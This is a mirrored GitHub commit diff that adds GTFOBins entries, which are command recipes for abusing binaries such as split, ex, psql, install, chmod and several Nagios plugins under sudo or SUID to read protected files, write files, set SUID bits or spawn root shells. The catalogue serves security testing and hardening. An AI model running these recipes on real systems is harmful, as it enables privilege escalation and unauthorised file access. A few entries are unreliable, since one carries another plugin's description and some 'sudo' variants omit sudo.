mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Merge pull request #147 from mindfuckup/master
This commit is contained in:
commit
65857d486b
15
_gtfobins/basenc.md
Normal file
15
_gtfobins/basenc.md
Normal file
@ -0,0 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
basenc --base64 $LFILE | basenc -d --base64
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
basenc --base64 $LFILE | basenc -d --base64
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo basenc --base64 $LFILE | basenc -d --base64
|
||||
---
|
11
_gtfobins/check_by_ssh.md
Normal file
11
_gtfobins/check_by_ssh.md
Normal file
@ -0,0 +1,11 @@
|
||||
---
|
||||
description: |
|
||||
This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`.
|
||||
functions:
|
||||
shell:
|
||||
- description: The shell will only last 10 seconds.
|
||||
code: check_by_ssh -o "ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)" -H localhost -C xx
|
||||
sudo:
|
||||
- description: The shell will only last 10 seconds.
|
||||
code: sudo check_by_ssh -o "ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)" -H localhost -C xx
|
||||
---
|
13
_gtfobins/check_cups.md
Normal file
13
_gtfobins/check_cups.md
Normal file
@ -0,0 +1,13 @@
|
||||
---
|
||||
description: |
|
||||
This is the `check_cups` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
check_cups --extra-opts=@$LFILE
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo check_cups --extra-opts=@$LFILE
|
||||
---
|
21
_gtfobins/check_log.md
Normal file
21
_gtfobins/check_log.md
Normal file
@ -0,0 +1,21 @@
|
||||
---
|
||||
description: |
|
||||
This is the `check_log` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
OUTPUT=output_file
|
||||
check_log -F $LFILE -O $OUTPUT
|
||||
cat $OUTPUT
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
INPUT=input_file
|
||||
check_log -F $INPUT -O $LFILE
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
INPUT=input_file
|
||||
sudo check_log -F $INPUT -O $LFILE
|
||||
---
|
13
_gtfobins/check_memory.md
Normal file
13
_gtfobins/check_memory.md
Normal file
@ -0,0 +1,13 @@
|
||||
---
|
||||
description: |
|
||||
This is the `check_memory` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
check_memory --extra-opts=@$LFILE
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo check_memory --extra-opts=@$LFILE
|
||||
---
|
13
_gtfobins/check_raid.md
Normal file
13
_gtfobins/check_raid.md
Normal file
@ -0,0 +1,13 @@
|
||||
---
|
||||
description: |
|
||||
This is the `check_raid` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
check_raid --extra-opts=@$LFILE
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo check_raid --extra-opts=@$LFILE
|
||||
---
|
26
_gtfobins/check_ssl_cert.md
Normal file
26
_gtfobins/check_ssl_cert.md
Normal file
@ -0,0 +1,26 @@
|
||||
---
|
||||
description: |
|
||||
This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`.
|
||||
functions:
|
||||
command:
|
||||
- description: The host example.net must return a certificate via TLS
|
||||
code: |
|
||||
COMMAND=id
|
||||
OUTPUT=output_file
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND | tee $OUTPUT" > $TF
|
||||
chmod +x $TF
|
||||
check_ssl_cert --curl-bin $TF -H example.net
|
||||
cat $OUTPUT
|
||||
sudo:
|
||||
- description: The host example.net must return a certificate via TLS
|
||||
code: |
|
||||
COMMAND=id
|
||||
OUTPUT=output_file
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND | tee $OUTPUT" > $TF
|
||||
chmod +x $TF
|
||||
umask 022
|
||||
check_ssl_cert --curl-bin $TF -H example.net
|
||||
cat $OUTPUT
|
||||
---
|
13
_gtfobins/check_statusfile.md
Normal file
13
_gtfobins/check_statusfile.md
Normal file
@ -0,0 +1,13 @@
|
||||
---
|
||||
description: |
|
||||
This is the `check_statusfile` Nagios plugi plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
check_statusfile $LFILE
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo check_statusfile $LFILE
|
||||
---
|
@ -1,12 +1,12 @@
|
||||
---
|
||||
description: This can be run with elevated privileges to change permissions and then read, write, or execute a file.
|
||||
description: This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a file.
|
||||
functions:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_change
|
||||
./chmod 0777 $LFILE
|
||||
./chmod 6777 $LFILE
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_change
|
||||
sudo chmod 0777 $LFILE
|
||||
sudo chmod 6777 $LFILE
|
||||
---
|
||||
|
17
_gtfobins/column.md
Normal file
17
_gtfobins/column.md
Normal file
@ -0,0 +1,17 @@
|
||||
---
|
||||
description: |
|
||||
`column` expects textual data.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
column $LFILE
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./column $LFILE
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo column $LFILE
|
||||
---
|
15
_gtfobins/comm.md
Normal file
15
_gtfobins/comm.md
Normal file
@ -0,0 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
comm $LFILE /dev/null 2>/dev/null
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
comm $LFILE /dev/null 2>/dev/null
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo comm $LFILE /dev/null 2>/dev/null
|
||||
---
|
18
_gtfobins/csplit.md
Normal file
18
_gtfobins/csplit.md
Normal file
@ -0,0 +1,18 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
csplit $LFILE 1
|
||||
cat xx01
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
csplit $LFILE 1
|
||||
cat xx01
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
csplit $LFILE 1
|
||||
cat xx01
|
||||
---
|
24
_gtfobins/ex.md
Normal file
24
_gtfobins/ex.md
Normal file
@ -0,0 +1,24 @@
|
||||
---
|
||||
functions:
|
||||
shell:
|
||||
- code: |
|
||||
ex
|
||||
!/bin/sh
|
||||
file-write:
|
||||
- code: |
|
||||
ex file_to_write
|
||||
a
|
||||
DATA
|
||||
.
|
||||
w
|
||||
q
|
||||
file-read:
|
||||
- code: |
|
||||
ex file_to_read
|
||||
,p
|
||||
q
|
||||
sudo:
|
||||
- code: |
|
||||
sudo ex
|
||||
!/bin/sh
|
||||
---
|
14
_gtfobins/install.md
Normal file
14
_gtfobins/install.md
Normal file
@ -0,0 +1,14 @@
|
||||
---
|
||||
description: This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a copy of the file.
|
||||
functions:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_change
|
||||
TF=$(mktemp)
|
||||
./install -m 6777 $LFILE $TF
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_change
|
||||
TF=$(mktemp)
|
||||
sudo install -m 6777 $LFILE $TF
|
||||
---
|
15
_gtfobins/join.md
Normal file
15
_gtfobins/join.md
Normal file
@ -0,0 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
join -a 2 /dev/null $LFILE
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
join -a 2 /dev/null $LFILE
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo join -a 2 /dev/null $LFILE
|
||||
---
|
@ -1,5 +1,10 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- description: The file is typeset and some warning messages may appear.
|
||||
code: |
|
||||
LFILE=file_to_read
|
||||
nroff $LFILE
|
||||
shell:
|
||||
- code: |
|
||||
TF=$(mktemp -d)
|
||||
|
15
_gtfobins/paste.md
Normal file
15
_gtfobins/paste.md
Normal file
@ -0,0 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
paste $LFILE
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
paste $LFILE
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo paste $LFILE
|
||||
---
|
16
_gtfobins/pr.md
Normal file
16
_gtfobins/pr.md
Normal file
@ -0,0 +1,16 @@
|
||||
---
|
||||
description: Some bytes are altered so it might not be suitable for binary files.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
pr -T $LFILE
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
pr -T $LFILE
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
pr -T $LFILE
|
||||
---
|
14
_gtfobins/psql.md
Normal file
14
_gtfobins/psql.md
Normal file
@ -0,0 +1,14 @@
|
||||
---
|
||||
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||||
functions:
|
||||
shell:
|
||||
- code: |
|
||||
psql
|
||||
\?
|
||||
!/bin/sh
|
||||
sudo:
|
||||
- code: |
|
||||
psql
|
||||
\?
|
||||
!/bin/sh
|
||||
---
|
15
_gtfobins/rev.md
Normal file
15
_gtfobins/rev.md
Normal file
@ -0,0 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
rev $LFILE | rev
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./rev $LFILE | rev
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo rev $LFILE | rev
|
||||
---
|
27
_gtfobins/split.md
Normal file
27
_gtfobins/split.md
Normal file
@ -0,0 +1,27 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
TF=$(mktemp)
|
||||
split $LFILE $TF
|
||||
cat $TF*
|
||||
command:
|
||||
- description: Command execution using an existing or newly created file.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
split --filter=$COMMAND $TF
|
||||
- description: Command execution using stdin (and close it directly).
|
||||
code: |
|
||||
COMMAND=id
|
||||
echo | split --filter=$COMMAND /dev/stdin
|
||||
shell:
|
||||
- description: The shell prompt is not printed.
|
||||
code: |
|
||||
split --filter=/bin/sh /dev/stdin
|
||||
sudo:
|
||||
- description: The shell prompt is not printed.
|
||||
code: |
|
||||
split --filter=/bin/sh /dev/stdin
|
||||
---
|
17
_gtfobins/ss.md
Normal file
17
_gtfobins/ss.md
Normal file
@ -0,0 +1,17 @@
|
||||
---
|
||||
description: |
|
||||
The file content is actually parsed so only a part of the first line is returned as a part of an error message.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
ss -a -F $LFILE
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./ss -a -F $LFILE
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo ss -a -F $LFILE
|
||||
---
|
17
_gtfobins/ssh-keyscan.md
Normal file
17
_gtfobins/ssh-keyscan.md
Normal file
@ -0,0 +1,17 @@
|
||||
---
|
||||
description: |
|
||||
The file content is actually parsed so only a part of each line is returned as a part of an error message.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
ssh-keyscan -f $LFILE
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./ssh-keyscan -f $LFILE
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo ssh-keyscan -f $LFILE
|
||||
---
|
17
_gtfobins/tbl.md
Normal file
17
_gtfobins/tbl.md
Normal file
@ -0,0 +1,17 @@
|
||||
---
|
||||
description: |
|
||||
The read file content is corrupted by additional text at the beginning.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
tbl $LFILE
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./tbl $LFILE
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo tbl $LFILE
|
||||
---
|
17
_gtfobins/troff.md
Normal file
17
_gtfobins/troff.md
Normal file
@ -0,0 +1,17 @@
|
||||
---
|
||||
description: |
|
||||
The file is typeset but text is still readable in the output, alternatively the output can be read with `man -l`.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
troff $LFILE
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./troff $LFILE
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo troff $LFILE
|
||||
---
|
17
_gtfobins/xmodmap.md
Normal file
17
_gtfobins/xmodmap.md
Normal file
@ -0,0 +1,17 @@
|
||||
---
|
||||
description: |
|
||||
The read file content is corrupted by error prints.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
xmodmap -v $LFILE
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./xmodmap -v $LFILE
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo xmodmap -v $LFILE
|
||||
---
|
Loading…
Reference in New Issue
Block a user